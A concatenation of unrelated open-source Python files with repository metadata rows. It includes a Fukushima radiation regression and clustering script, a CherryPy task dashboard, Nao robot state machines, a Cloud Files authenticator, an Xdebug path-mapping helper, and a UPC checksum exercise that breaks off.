    # Haversine formula: a is the squared half-chord length, the arctan2
    # form of the central angle is numerically stable near the antipodes.
    a = np.sin(half_dlat) ** 2 + np.cos(lat) * np.cos(plant_lat) * np.sin(half_dlon) ** 2
    central_angle = 2 * np.arctan2(np.sqrt(a), np.sqrt(1 - a))
    return earth_radius_km * central_angle
def Fstat_pval(y, y_hat):
    """p-value of the regression F-test for a one-predictor OLS fit.

    Parameters
    ----------
    y : array-like
        Observed responses.
    y_hat : array-like
        Fitted values predicted by the model for the same observations.

    Returns
    -------
    float
        P(F > F_observed) under the null hypothesis that the model explains
        nothing; small values indicate a significant fit.

    Notes
    -----
    F = MSM / MSE with MSM = sum((y_hat - mean(y))**2) / dfn and
    MSE = sum((y - y_hat)**2) / dfd.  The previous implementation summed the
    raw (unsquared) deviations, so MSM was ~0 by construction and MSE could
    even be negative, making the returned p-value meaningless.
    """
    dfn = 1
    dfd = len(y) - dfn - 1
    y = np.asarray(y, dtype=float)
    y_hat = np.asarray(y_hat, dtype=float)
    # Model and error mean squares (sums of SQUARED deviations).
    MSM = ((y_hat - y.mean()) ** 2).sum() / dfn
    MSE = ((y - y_hat) ** 2).sum() / dfd
    F = MSM / MSE
    p = 1.0 - scipy.stats.f.cdf(F, dfn, dfd)
    return p
# ---------------------------------------------------------------------------
# Analysis script: load the filtered measurements, fit radiation level as a
# function of distance to the Fukushima Daiichi plant, flag loaders whose
# readings do not follow the model, and cluster the readings into regions.
# Fixes applied: 'bbox_in ches' SyntaxError on the last savefig; three output
# paths were missing the '/' before 'Desktop'; region relabelling now uses
# the rank of each centroid instead of sort_index[label].
# ---------------------------------------------------------------------------

# Load data for large files
original_filename = "/Users/" + os.getlogin() + "/Desktop/measurements.csv"
modified_filename = "/Users/" + os.getlogin() + "/Desktop/measurements_modified.csv"
df = getData(original_filename, modified_filename)
df = df.set_index('Captured Time')

# Show head of data frame
print(df.head())

# Plot distance to Fukushima vs Radiation level
plt.figure()
df.plot( x = 'Distance To Fukushima in Km', y = 'Value', style = 'o', label='All loaders')
plt.xlabel( 'Distance To Fukushima in Km' )
plt.ylabel( 'Value in CPM' )
plt.axis( 'tight' )
namefig = "/Users/" + os.getlogin() + '/Desktop/Distance_vs_Radiation.png'
plt.savefig(namefig, bbox_inches='tight')

# Box Cox transform on the data to make the response closer to normal
df['Value transf'], lambd = stats.boxcox(df['Value'])

# Check that there is only one radioactivity measure unit
print(pd.unique(df.Unit.ravel()))

# Make plots, using the box-cox transformed data
plt.figure()
df.plot( x = 'Distance To Fukushima in Km', y = 'Value transf', style = 'o', label='All loaders')
plt.xlabel( 'Distance To Fukushima in Km' )
plt.ylabel( 'Value in CPM (box cox transform)' )
plt.axis( 'tight' )
namefig = '/Users/' + os.getlogin() + '/Desktop/Distance_vs_Radiation_Box_Cox.png'
plt.savefig(namefig, bbox_inches='tight')

# OLS fit for radiation level as a function of distance from the plant
X = df[ 'Distance To Fukushima in Km']
X = sm.add_constant(X)
y = df['Value transf']
model = sm.OLS( y , X)
result = model.fit()

# Print summary of OLS fit
print(result.summary())

# Plot regression line
y_hat = result.predict(X)
plt.plot(X, y_hat, 'r', alpha=0.9)

# Check which Loader IDs have values that don't fit the model well
alpha = 0.05
group_Loader_ID = df.groupby('Loader ID')
list_outliers_Loader_ID = []

# Loop over each group
for key , gp in group_Loader_ID:
    # Compute p value for how the model computed on the total dataset fits
    # this loader's readings
    gp = gp.sort('Distance To Fukushima in Km')
    X = gp['Distance To Fukushima in Km']
    X = sm.add_constant(X)
    y = gp['Value transf']
    y_hat = result.predict(X)
    p_value = Fstat_pval(y, y_hat)
    # NOTE(review): loaders are flagged when p_value > alpha; confirm this is
    # the intended direction for "does not fit the model well".
    if p_value > alpha:
        list_outliers_Loader_ID.append(key)
        # Plot data for outlier Loader IDs to visually inspect our results
        plt.figure()
        gp.plot( x = 'Distance To Fukushima in Km', y = 'Value transf', style = 'o', label='Loader ID %s, p_val = %f' % (key,p_value))
        plt.xlabel('Distance To Fukushima in Km')
        plt.ylabel('Value in CPM')
        plt.axis('tight')
        # Path fixed: previously missing '/' before 'Desktop'.
        namefig = '/Users/' + os.getlogin() + '/Desktop/Loader_ID_%s.png' % key
        plt.savefig(namefig, bbox_inches = 'tight')

print("This is the list of outlier Loader ID's:")
print(list_outliers_Loader_ID)

# Perform kmeans clustering
data_for_cluster = df[['Distance To Fukushima in Km', 'Value transf']]
data_for_cluster = np.asarray(data_for_cluster)
kmeans = KMeans(init = 'k-means++' , n_clusters = 10 , n_init = 10)
kmeans.fit(data_for_cluster)

# Plot the decision boundary of the clusters. Create a mesh
x_min, x_max = data_for_cluster[:, 0].min() , data_for_cluster[:, 0].max()
y_min, y_max = data_for_cluster[:, 1].min() , data_for_cluster[:, 1].max()
xx, yy = np.meshgrid(np.arange(x_min, x_max, 1), np.arange(y_min, y_max, 0.05))

# Get labels for points in mesh
Z = kmeans.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)

# Plot mesh
plt.figure()
plt.imshow( Z, interpolation = 'nearest', extent = (x_min, x_max, y_min, y_max),
           cmap = plt.cm.Paired, aspect = 'auto', origin = 'lower')
plt.plot(data_for_cluster[:, 0], data_for_cluster[:, 1], 'k.', markersize = 2)

# Plot the centroids
centroids = kmeans.cluster_centers_
plt.scatter(centroids[:, 0], centroids[:, 1], marker = 'x',
            linewidths = 5, color = 'y', zorder = 10)
plt.title('K-means clustering on the dataset')
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
namefig = '/Users/' + os.getlogin() + '/Desktop/Region_clusters.png'
plt.savefig(namefig, bbox_inches = 'tight')

# Add kmeans labels as a column to data frame. Since labels are assigned randomly,
# we re-name the labels so that Region 0 is the closest one to the plant, followed by Region 1, etc.
df['Cluster Labels'] = kmeans.labels_
centroids_x_axis = centroids[:, 0]
sort_index = np.argsort(centroids_x_axis)
# sort_index[rank] is the cluster label whose centroid is rank-th closest to
# the plant, so the cluster gets named after its rank (the previous code used
# sort_index[label], which names clusters after the wrong index).
for rank, label in enumerate(sort_index):
    df.loc[df['Cluster Labels']==label, 'Cluster Labels'] = 'Region %s' % rank

# Plot a time series and histogram for each Region
for label in range(0,10):
    ts = df[ df['Cluster Labels'] == 'Region %s' %label]['Value']
    ts = ts.sort_index()
    plt.figure()
    ts.plot()
    pd.rolling_mean(ts, 100).plot(style = 'k--', linewidth = 5)
    locs, labels = plt.xticks()
    plt.setp(labels, rotation=30)
    plt.title('Time series for Region %s'%label)
    # Path fixed: previously missing '/' before 'Desktop'.
    namefig = '/Users/' + os.getlogin() + '/Desktop/Region_%s_timeseries.png' % label
    plt.savefig(namefig, bbox_inches='tight')
    plt.figure()
    ts.hist()
    plt.title('Histogram for Region %s'%label)
    namefig = '/Users/' + os.getlogin() + '/Desktop/Region_%s_histogram.png' % label
    # Fixed: the keyword was written 'bbox_in ches', a SyntaxError.
    plt.savefig(namefig, bbox_inches='tight')
UTF-8
Python
false
false
2,014
6,021,544,149,745
71d5006df5e8a7db19a19f58150c976b43744dc9
38f6f5ce0a9f697a7f4c9b405773db4ad69fa63f
/lgTask/cherrypy/lgTaskRoot.py
3402eff05bef017c590e0f7c013d6979e2487373
[]
no_license
wwoods/lamegame_tasking
https://github.com/wwoods/lamegame_tasking
87b672aa903387fac581bf6e69a740822500887f
df2f132d0d9c62f48e171c8c2c60ba602e84b89c
refs/heads/master
2020-06-03T04:28:59.277429
2013-03-19T00:57:17
2013-03-19T00:57:17
2,810,622
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import cherrypy
import datetime
import lgTask
from lgTask.cherrypy.staticServer import StaticServer
from lgTask.lib.timeInterval import TimeInterval
import os
from controls import *
class TaskView(Control):
    """Renders one titled table of tasks matching a mongo query."""

    template = """<h2>{title}</h2>{children}"""
    # Define these so they go to class args rather than kwargs
    query = None
    sort = None
    limit = None
    conn = None
    showKill = False

    def build(self):
        """Run the configured query and append the resulting table."""
        columns = [
            ('taskClass', 'Task Class'),
            ('kwargs', 'Task Kwargs'),
            ('state', 'State'),
            ('tsStart', 'Started'),
            ('tsStop', 'Stopped'),
            ('lastLog', 'Last Log'),
        ]
        # One extra column for the task-id link, plus an optional kill link.
        width = len(columns) + 1 + (1 if self.showKill else 0)
        table = Table(width)
        # Header row.
        if self.showKill:
            table.add_cell(TextControl(text = 'kill'))
        table.add_cell(TextControl(text = 'Task ID'))
        for _, heading in columns:
            table.add_cell(TextControl(text = heading))
        # One row per matching task document.
        matches = self.conn._database[self.conn.TASK_COLLECTION].find(
            self.query, sort = self.sort, limit = self.limit)
        for doc in matches:
            task_id = doc['_id']
            if self.showKill:
                table.add_cell(LiteralControl(
                    html = '<a href="killTask?id={0}">kill</a>'.format(task_id)))
            table.add_cell(LiteralControl(
                html = '<a href="taskLog?id={0}">{0}</a>'.format(task_id)))
            for key, _ in columns:
                table.add_cell(TextControl(text = str(doc.get(key, ''))))
        self.append(table)
class LgTaskRoot(object):
    """Cherrypy-based object for serving up stats about a cluster of lgTask
    processors.
    """

    static = StaticServer(
        os.path.join(
            os.path.dirname(os.path.abspath(__file__))
            , 'static'))

    def __init__(self, connection):
        """Creates a root object capable of serving up information about the
        given lgTask.Connection and its processors.
        """
        self._conn = connection

    @cherrypy.expose
    def index(self):
        """Render the dashboard: four task tables on one page."""
        sections = [
            dict(
                title = 'Recently Failed Tasks',
                query = dict(
                    state = 'error',
                    tsStop = {
                        '$gt': datetime.datetime.utcnow()
                            - TimeInterval('7 days')
                    },
                ),
                sort = [ ('tsStop', -1) ],
            ),
            dict(
                title = 'Oldest Running Tasks',
                query = dict(state = 'working'),
                sort = [ ('tsRequest', 1) ],
                showKill = True,
            ),
            dict(
                title = 'Upcoming Tasks',
                query = dict(state = 'request'),
                sort = [ ('tsRequest', 1) ],
            ),
            dict(
                title = 'Recently Completed Tasks',
                query = dict(
                    state = { '$in': lgTask.Connection.states.DONE_GROUP }),
                sort = [ ('tsStop', -1) ],
            ),
        ]
        body = LgTaskPage()
        # Same four TaskViews as before, in the same order; each shows at
        # most ten tasks.
        for section in sections:
            body.append(TaskView(conn = self._conn, limit = 10, **section))
        return body.gethtml()

    @cherrypy.expose
    def killTask(self, id):
        """Kill task with id, then bounce back to the dashboard."""
        self._conn.killTask(id)
        raise cherrypy.HTTPRedirect('../')

    @cherrypy.expose
    def taskLog(self, id):
        """Return the log for task with ID.
        """
        # Fetch log blocks until the server hands back an empty one.
        blocks = []
        block = self._conn.talkGetTaskLog(id, 0)
        while block:
            blocks.append(block)
            block = self._conn.talkGetTaskLog(id, len(blocks))
        page = LgTaskPage()
        page.append(LiteralControl(
            html='<h1>Task {0}</h1><pre style="white-space:pre-wrap;">{1}</pre>'
                .format(id, ''.join(blocks))))
        return page.gethtml()
UTF-8
Python
false
false
2,013
1,511,828,533,838
2d25d13a278c97050d731b5e9a82d109795e2998
d4a8b8e6dd996ef8889407d0e6f577f63de0062a
/noggin/players/LocStates.py
65d0043c53248aa49d4a3156c8e115c992ad0d50
[
"GPL-3.0-only",
"LGPL-3.0-only"
]
non_permissive
burst/nao-man
https://github.com/burst/nao-man
f1821aee28f14a4c2a56ff3bb2a0da0d73d29001
3bd95e01560cfb46492be260e5ca1979ca6239e5
refs/heads/master
2021-01-18T04:07:33.657770
2009-04-20T06:12:52
2009-04-20T06:12:52
182,038
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import man.motion.SweetMoves as SweetMoves
import man.noggin.NogginConstants as NogginConstants
SPIN_TIME = 360   # counter ticks to spend spinning in spinLocalize (presumably frames -- confirm)
WAIT_TIME = 45    # counter ticks to stand still in waitToMove
WALK_TIME = 200   # counter ticks to walk forward in walkForward
TARGET_X = NogginConstants.OPP_GOALBOX_LEFT_X   # navigation goal used by goToPoint
TARGET_Y = NogginConstants.CENTER_FIELD_Y
def gamePlaying(player):
    """Entry state for the playing phase: head straight for the target."""
    #player.brain.loc.reset()
    return player.goLater('goToPoint')
def spinLocalize(player):
    """Spin in place with localization pans for SPIN_TIME ticks."""
    if player.firstFrame():
        player.brain.tracker.switchTo('locPans')
        player.setSpeed(0, 2, 15)
    if player.counter != SPIN_TIME:
        return player.stay()
    player.stopWalking()
    return player.goNow('waitToMove')
def waitToMove(player):
    """Stand still for WAIT_TIME ticks, then head for the target point."""
    return player.goNow('goToPoint') if player.counter > WAIT_TIME else player.stay()
def goToPoint(player):
    """Walk to (TARGET_X, TARGET_Y) while panning for localization."""
    if player.firstFrame():
        # Kick off the pan and the navigation request exactly once.
        player.brain.tracker.switchTo('locPans')
        player.brain.nav.goTo(TARGET_X, TARGET_Y)
        return player.stay()
    if not player.brain.nav.isStopped():
        return player.stay()
    return player.goLater('doneState')
def walkForward(player):
    """Walk straight ahead for WALK_TIME ticks, then finish."""
    if player.firstFrame():
        player.setSpeed(4, 0, 0)
    if player.counter <= WALK_TIME:
        return player.stay()
    return player.goLater('doneState')
def doneState(player):
    """Halt motion, then transition to sitDown once navigation stops."""
    if player.firstFrame():
        player.stopWalking()
        player.brain.tracker.stopHeadMoves()
    if not player.brain.nav.isStopped():
        return player.stay()
    return player.goLater('sitDown')
def sitDown(player):
    """Execute the sit pose; cut motor gains once the body is still."""
    if player.firstFrame():
        player.executeMove(SweetMoves.SIT_POS)
        return player.stay()
    if player.brain.motion.isBodyActive():
        return player.stay()
    player.gainsOff()
    return player.goLater('doneDone')
def doneDone(player):
    """Terminal state: remain here forever."""
    return player.stay()
from settings_changeme import *

# Deployment-specific overrides for the base settings imported above.
DEBUG = True

#Post Save Filters
# Each entry is (dotted path to the filter factory, positional args passed
# to it).
POST_SAVE_FILTERS = [
    ("tardis.tardis_portal.filters.flexstation.make_filter",
     ["FLEXSTATION", "http://rmit.edu.au/flexstation"]), # Flexstation III filter
    ]

# The filter middleware wires POST_SAVE_FILTERS into the request cycle.
MIDDLEWARE_CLASSES += ('tardis.tardis_portal.filters.FilterInitMiddleware',)
UTF-8
Python
false
false
2,013
15,032,385,556,033
542116df6f72771417e4683b96c4664b5c14cd8c
99d5b87018e11979dd417fcf40686f92e7ee33ef
/sample/hello/hello_world.py
0e606d9a9bc4314d5354420c6c6590352e05646b
[
"MIT"
]
permissive
william-os4y/fapws2
https://github.com/william-os4y/fapws2
123a0b8cbb8cbe343ee6ab7a8a33f7b5ad664238
5752af742b763517ce0a52d0f0c00b40b186edf8
refs/heads/master
2020-05-31T08:20:53.247648
2008-12-23T13:18:00
2008-12-26T14:29:35
70,378
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python
import _evhttp as evhttp
from fapws2 import base
import time
import sys
# Fixed: the original line ASSIGNED 100000 to the name sys.setcheckinterval
# (replacing the function with an int and never changing the interpreter's
# check interval); the intent per the comment is to call it.
sys.setcheckinterval(100000) # since we don't use threads, internal checks are no more required
from fapws2.contrib import views, zip
def start():
    """Configure the demo WSGI handlers and run the fapws2 event loop.

    Registers URL callbacks on the evhttp C extension, then blocks in
    event_dispatch().  Must be called after the module is imported.
    """
    evhttp.start("0.0.0.0", 8080)
    #print evhttp.get_timeout()
    #evhttp.set_timeout(3)
    #print evhttp.get_timeout()
    evhttp.set_base_module(base)
    # Fallback handler for any path without a registered callback.
    def generic(environ, start_response):
        #print "GENERIC ENV",environ
        return ["Page not found"]
    @zip.Gzip()
    def hello(environ, start_response):
        #print "Header", environ
        if environ["PATH_INFO"]!="":
            return generic(environ, start_response)
        #print "params",environ["fapws.params"]
        #print "query",environ["QUERY_STRING"]
        #time.sleep(1)
        start_response('200 WHYNOT', [('toto',4444)])
        return ["Hello World!!"]
    # Serves long.txt by returning the open file object to the server.
    def staticlong(environ, start_response):
        try:
            f=open("long.txt", "rb")
        except:
            f=["Page not found"]
        return f
    @zip.Gzip()
    def staticlongzipped(environ, start_response):
        try:
            f=open("long.txt", "rb")
        except:
            f=["Page not found"]
        return f
    def staticshort(environ, start_response):
        f=open("short.txt", "rb")
        return f
    # Echoes the POSTed body and parsed parameters.
    def testpost(environ, start_response):
        print "INPUT DATA",environ["wsgi.input"].getvalue()
        return ["OK. params are:%s" % (environ["fapws.params"])]
    # Demonstrates that any callable (here a class instance) can be a handler.
    class Test:
        def __init__(self):
            pass
        def __call__(self, environ, start_response):
            return ["Hello from Test"]
    evhttp.http_cb("/hello",hello)
    evhttp.http_cb("/longzipped", staticlongzipped)
    evhttp.http_cb("/long", staticlong)
    evhttp.http_cb("/short", staticshort)
    t=Test()
    evhttp.http_cb("/class", t)
    staticform=views.Staticfile("test.html")
    evhttp.http_cb("/staticform", staticform)
    evhttp.http_cb("/testpost", testpost)
    evhttp.http_cb("/",hello)
    evhttp.gen_http_cb(generic)
    # Blocks here, dispatching events until the process is stopped.
    evhttp.event_dispatch()
# Run the demo server when executed directly.
if __name__=="__main__":
    start()
UTF-8
Python
false
false
2,008
13,013,750,912,620
717fe88225450195ba7fbd7679205780fb43e874
5b317b27771e6caec637948f1925310b96c7a7fd
/cloudfiles_storage/auth.py
5f844a383b434331b3ccb274ff52539fce37fdcf
[]
no_license
techresidents/trweb
https://github.com/techresidents/trweb
fc1a5bdb380c647174ff715d7491b69c4eae41b4
acd8b7b1837519e819c16bb732d08a9acebb60a4
refs/heads/master
2020-12-25T19:04:11.169009
2013-10-10T23:18:30
2013-10-10T23:18:30
19,194,341
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
import json
import re
import urlparse
from cloudfiles.errors import AuthenticationError, AuthenticationFailed, ResponseError
def parse_url(url):
    """Split *url* into a ``(host, port, path, is_ssl)`` tuple.

    Only http/https URLs are supported; when the netloc carries no port,
    443 is assumed for https and 80 for http.  The returned path has its
    surrounding slashes stripped.
    """
    scheme, netloc, path = urlparse.urlparse(url)[:3]
    # We only support web services
    if scheme not in ('http', 'https'):
        raise ValueError('Scheme must be one of http or https')
    is_ssl = scheme == 'https'
    # Verify hostname is valid and pick up the optional port.
    match = re.match(r"([a-zA-Z0-9\-\.]+):?([0-9]{2,5})?", netloc)
    if not match:
        raise ValueError('Invalid host and/or port: %s' % netloc)
    host, port = match.groups()
    if not port:
        port = '443' if is_ssl else '80'
    return (host, int(port), path.strip('/'), is_ssl)
class CloudfilesAuthenticator(object):
    """Authenticates against the Rackspace identity service (v2.0).

    Exchanges a username plus either an api_key or a password for the
    cloudFiles / cloudFilesCDN public endpoint URLs and an auth token.
    """
    def __init__(self,
            username,
            api_key=None,
            password=None,
            timeout=5,
            auth_endpoint=None,
            connection_class=None):
        # One of api_key / password must be supplied; authenticate()
        # raises ValueError otherwise.
        self.username = username
        self.api_key = api_key
        self.password = password
        self.timeout = timeout
        self.endpoint = auth_endpoint or "https://identity.api.rackspacecloud.com/v2.0"
        self.connection_class = connection_class
        if self.connection_class is None:
            # Pick an http(s) connection class matching the endpoint scheme.
            import httplib
            if self.endpoint.startswith("https:"):
                self.connection_class = httplib.HTTPSConnection
            else:
                self.connection_class = httplib.HTTPConnection

        #parse endpoint
        self.host, self.port, self.path, self.is_ssl = \
                parse_url(self.endpoint)

        #connection (created once and reused by send_request)
        self.connection = self.connection_class(
                host=self.host,
                port=self.port,
                timeout=self.timeout)

    def authenticate(self):
        """Return (cloudfiles_url, cloudfiles_cdn_url, auth_token).

        Picks the endpoints whose region matches the account's default
        region.  Any malformed response (including a service catalog with
        no matching region, which surfaces as a NameError below) is
        re-raised as AuthenticationError.
        """
        if self.api_key is not None:
            response = self.authenticate_api_key(
                    username=self.username,
                    api_key=self.api_key)
        elif self.password is not None:
            response = self.authenticate_password(
                    username=self.username,
                    password=self.password)
        else:
            raise ValueError("api_key or password required.")

        try:
            default_region = response["access"]["user"]["RAX-AUTH:defaultRegion"]
            auth_token = response["access"]["token"]["id"]
            for service in response["access"]["serviceCatalog"]:
                if service["name"] == "cloudFiles":
                    for endpoint in service["endpoints"]:
                        if endpoint["region"] == default_region:
                            cloudfiles_url = endpoint["publicURL"]
                if service["name"] == "cloudFilesCDN":
                    for endpoint in service["endpoints"]:
                        if endpoint["region"] == default_region:
                            cloudfiles_cdn_url = endpoint["publicURL"]
            return cloudfiles_url, cloudfiles_cdn_url, auth_token
        except Exception as error:
            raise AuthenticationError("Invalid response from authentication service: %s" \
                    % str(error))

    def authenticate_api_key(self, username, api_key):
        """POST api-key credentials to /tokens and return the parsed JSON."""
        # NOTE(review): the payload is built by %-interpolation, so a
        # username/api_key containing '"' or '\' yields invalid JSON;
        # consider json.dumps for proper escaping.
        data = """
        {
            "auth": {
                "RAX-KSKEY:apiKeyCredentials": {
                    "username": "%s",
                    "apiKey": "%s"
                }
            }
        }
        """ % (username, api_key)

        headers = {
            "Content-type": "application/json"
        }

        response = self.send_request("POST", "/tokens", data, headers)
        result = json.loads(response.read())
        return result

    def authenticate_password(self, username=None, password=None):
        """POST password credentials to /tokens and return the parsed JSON."""
        # NOTE(review): same %-interpolation escaping caveat as
        # authenticate_api_key above.
        data = """
        {
            "auth": {
                "passwordCredentials": {
                    "username": "%s",
                    "password": "%s"
                }
            }
        }
        """ % (username, password)

        headers = {
            "Content-type": "application/json"
        }

        response = self.send_request("POST", "/tokens", data, headers)
        result = json.loads(response.read())
        return result

    def default_headers(self, method, path, data):
        """Headers added to every request (may be overridden by callers)."""
        headers = {
            'Content-Length': str(len(data)),
        }
        return headers

    def send_request(self, method, path, data=None, headers=None):
        """Issue a request relative to the endpoint path and validate it.

        A 401 response is converted to AuthenticationFailed; any other
        non-2xx status raises ResponseError (see validate_response).
        """
        data = data or ""
        user_headers = headers
        headers = self.default_headers(method, path, data)
        if user_headers is not None:
            headers.update(user_headers)

        path = "/%s/%s" % (self.path, path.strip("/"))

        try:
            self.connection.request(method, path, data, headers)
            response = self.connection.getresponse()
            self.validate_response(response)
        except ResponseError as error:
            if error.status == 401:
                raise AuthenticationFailed(error.reason)
            else:
                raise
        return response

    def validate_response(self, response):
        """Raise ResponseError unless the status is in the 2xx range."""
        if response.status < 200 or response.status > 299:
            # Drain the body so the persistent connection stays usable.
            response.read()
            raise ResponseError(response.status, response.reason)
UTF-8
Python
false
false
2,013
7,009,386,653,702
a02442a5fb11cb4c260757fa129bae43c9984d8b
495d8bd9ab41c7bf66e640b8f3006db4a227211b
/problem2.py
c6940288346ed6f80b70caf0fca56fe9f391c827
[]
no_license
billputer/project-euler
https://github.com/billputer/project-euler
e18161e76168dc0818dde2a0d34786cd7f10c66a
305e0fa2ae1c628ebb29c0277f776f930f0ba2b6
refs/heads/master
2021-01-13T02:14:32.977962
2014-10-24T23:18:06
2014-10-24T23:22:50
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python
def fib():
    """Infinite Fibonacci sequence generator: yields 1, 2, 3, 5, 8, ..."""
    current, following = 1, 2
    while True:
        yield current
        current, following = following, current + following
# By considering the terms in the Fibonacci sequence whose values do not
# exceed four million, find the sum of the even-valued terms.
s = 0
for x in fib():
    # stop when we exceed 4 million
    if x > 4000000:
        break
    # if even, add to s
    elif x % 2 == 0:
        s += x
# Parenthesized so the script runs under both Python 2 and Python 3
# (the bare "print s" statement was Python-2-only).
print(s)
UTF-8
Python
false
false
2,014
2,559,800,524,654
aec7226501f9623107c95eb8a56fb4479cc0d66b
7239bd3fd1a3fdd04273e109a2bff43813a1cd72
/alembic/versions/534f351a3913_re.py
b3551ca8ab6df5cbe8c1a5440f92d6542e04235f
[]
no_license
okamurayasuyuki/basic_flask
https://github.com/okamurayasuyuki/basic_flask
03015d6bb12089a18e5c1b1b70419c7b6f8aaabe
7a032dcaa841c4e9d9176188a2c6cbae2185c984
refs/heads/master
2020-05-18T11:25:54.213904
2013-11-01T09:23:12
2013-11-01T09:23:12
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""re
Revision ID: 534f351a3913
Revises: f3b5472547c
Create Date: 2013-11-01 06:43:17.972648
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '534f351a3913'       # this migration's id
down_revision = 'f3b5472547c'   # parent migration this one applies on top of
def upgrade():
    """Apply the migration: drop the ``title`` column from ``tags``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('tags', u'title')
    ### end Alembic commands ###
def downgrade():
    """Revert the migration: restore ``tags.title`` as a nullable VARCHAR(30)."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('tags', sa.Column(u'title', mysql.VARCHAR(length=30), nullable=True))
    ### end Alembic commands ###
UTF-8
Python
false
false
2,013
15,161,234,570,462
eabc887464e58c231854e7c0a1b895b3d8f0252e
df3122dad4c883652e303a3befe09d4b30477dea
/xdebug/util.py
fb2161c5e31b7cc7bd9b5f24df1d4ddd887ab4c7
[
"MIT"
]
permissive
thinktandem/SublimeTextXdebug
https://github.com/thinktandem/SublimeTextXdebug
59b92b2812a403c2a8fa66c96de5f1dedd60346d
d6118fa1a402c3b323d7e9052e3e4eb1648a19a6
refs/heads/master
2021-05-27T04:01:45.994500
2013-08-15T04:01:52
2013-08-15T04:01:52
12,124,303
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import sublime
import json
import os
import re
import sys
import webbrowser
# Helper module
try:
from .helper import H
except:
from helper import H
# Settings variables
try:
from . import settings as S
except:
import settings as S
# Log module
from .log import debug, info
def get_real_path(uri, server=False):
    """
    Get real path

    Keyword arguments:
    uri -- Uri of file that needs to be mapped and located
    server -- Map local path to server path

    TODO: Fix mapping for root (/) and drive letters (P:/)
    """
    if uri is None:
        return uri
    # URLdecode uri
    uri = H.url_decode(uri)
    # Split scheme from uri to get absolute path
    try:
        # scheme:///path/file => scheme, /path/file
        # scheme:///C:/path/file => scheme, C:/path/file
        transport, filename = uri.split(':///', 1)
    except:
        # No scheme separator present; treat the whole value as a filename.
        filename = uri
    # Normalize path for comparison and remove duplicate/trailing slashes
    uri = os.path.normpath(filename)
    # Pattern for checking if uri is a windows path
    drive_pattern = re.compile(r'^[a-zA-Z]:[\\/]')
    # Append leading slash if filesystem is not Windows
    if not drive_pattern.match(uri) and not os.path.isabs(uri):
        uri = os.path.normpath('/' + uri)
    # Project-level mapping takes precedence over package-level mapping.
    path_mapping = S.get_project_value('path_mapping') or S.get_package_value('path_mapping')
    if not path_mapping is None:
        # Go through path mappings; only the FIRST matching entry is applied
        # (the loop breaks after a replacement).
        for server_path, local_path in path_mapping.items():
            server_path = os.path.normpath(server_path)
            local_path = os.path.normpath(local_path)
            # Replace path if mapping available
            if server:
                # Map local path to server path
                if local_path in uri:
                    uri = uri.replace(local_path, server_path)
                    break
            else:
                # Map server path to local path
                if server_path in uri:
                    uri = uri.replace(server_path, local_path)
                    break
    else:
        sublime.status_message("Xdebug: No path mapping defined, returning given path.")
    # Replace slashes (keep backslashes for Windows drive paths)
    if not drive_pattern.match(uri):
        uri = uri.replace("\\", "/")
    # Append scheme when producing a server-side path
    if server:
        return H.url_encode("file://" + uri)
    return uri
def launch_browser():
    """Open the configured URL in a browser with the Xdebug session GET parameter."""
    url = S.get_project_value('url') or S.get_package_value('url')
    if not url:
        sublime.status_message('Xdebug: No URL defined in (project) settings file.')
        return
    ide_key = S.get_project_value('ide_key') or S.get_package_value('ide_key') or S.DEFAULT_IDE_KEY
    # Start a session while listening (or not yet connected); otherwise stop it.
    if S.SESSION and (S.SESSION.listening or not S.SESSION.connected):
        action = 'XDEBUG_SESSION_START'
    else:
        action = 'XDEBUG_SESSION_STOP'
    webbrowser.open('%s?%s=%s' % (url, action, ide_key))
def load_breakpoint_data():
    """
    Load saved breakpoint data from the user data file into S.BREAKPOINT.

    Entries for deleted files or files without breakpoints are discarded.
    Failure to open or parse the data file is logged and leaves
    S.BREAKPOINT unchanged (beyond ensuring it is a dict).
    """
    data_path = os.path.join(sublime.packages_path(), 'User', S.FILE_BREAKPOINT_DATA)
    data = {}
    try:
        # Use a context manager so the file handle is always closed (the
        # previous code leaked it, and hit a NameError on the undefined
        # handle when open() failed).
        with open(data_path, 'rb') as data_file:
            contents = data_file.read()
    except:
        e = sys.exc_info()[1]
        info('Failed to open %s.' % data_path)
        debug(e)
    else:
        try:
            data = json.loads(H.data_read(contents))
        except:
            e = sys.exc_info()[1]
            info('Failed to parse %s.' % data_path)
            debug(e)
    # Do not use deleted files or entries without breakpoints
    if data:
        for filename, breakpoint_data in data.copy().items():
            if not breakpoint_data or not os.path.isfile(filename):
                del data[filename]
    if not isinstance(S.BREAKPOINT, dict):
        S.BREAKPOINT = {}
    # Set breakpoint data
    S.BREAKPOINT.update(data)
def save_breakpoint_data():
    """Serialize S.BREAKPOINT to the user breakpoint data file."""
    data_path = os.path.join(sublime.packages_path(), 'User', S.FILE_BREAKPOINT_DATA)
    serialized = H.data_write(json.dumps(S.BREAKPOINT))
    with open(data_path, 'wb') as data_file:
        data_file.write(serialized)
#!/usr/bin/env python3
"""
Perform a checksum on a UPC.
This module contains one function checksum. It can be passed a parameter
that is a string which must be 12 characters long. All
other inputs will result in an error.
Assignment 1, Exercise 2, INF1340 Fall 2014
"""
__author__ = 'Sam Novak and Jodie Church'
__copyright__ = "2014 Sam Novak and Jodie Church"
__license__ = "MIT License"
__status__ = "Prototype"
def checksum(upc):
    """
    Checks if the digits in a UPC are consistent with the check digit.

    :param upc: a 12-digit universal product code, as a string
    :return:
        Boolean: True, checksum is correct
                 False, otherwise
    :raises:
        TypeError if input is not a string
        ValueError if the string is not exactly 12 characters long; the
            message states the actual length received (the old message
            omitted this despite the docstring promising it)
    """
    # check type of input (isinstance instead of `type(x) is str`)
    if not isinstance(upc, str):
        raise TypeError("Invalid type passed as parameter")
    # check length of string
    if len(upc) != 12:
        raise ValueError("UPC must be 12 characters, got %d" % len(upc))
    # convert each character to its integer digit value
    digits = [int(ch) for ch in upc]
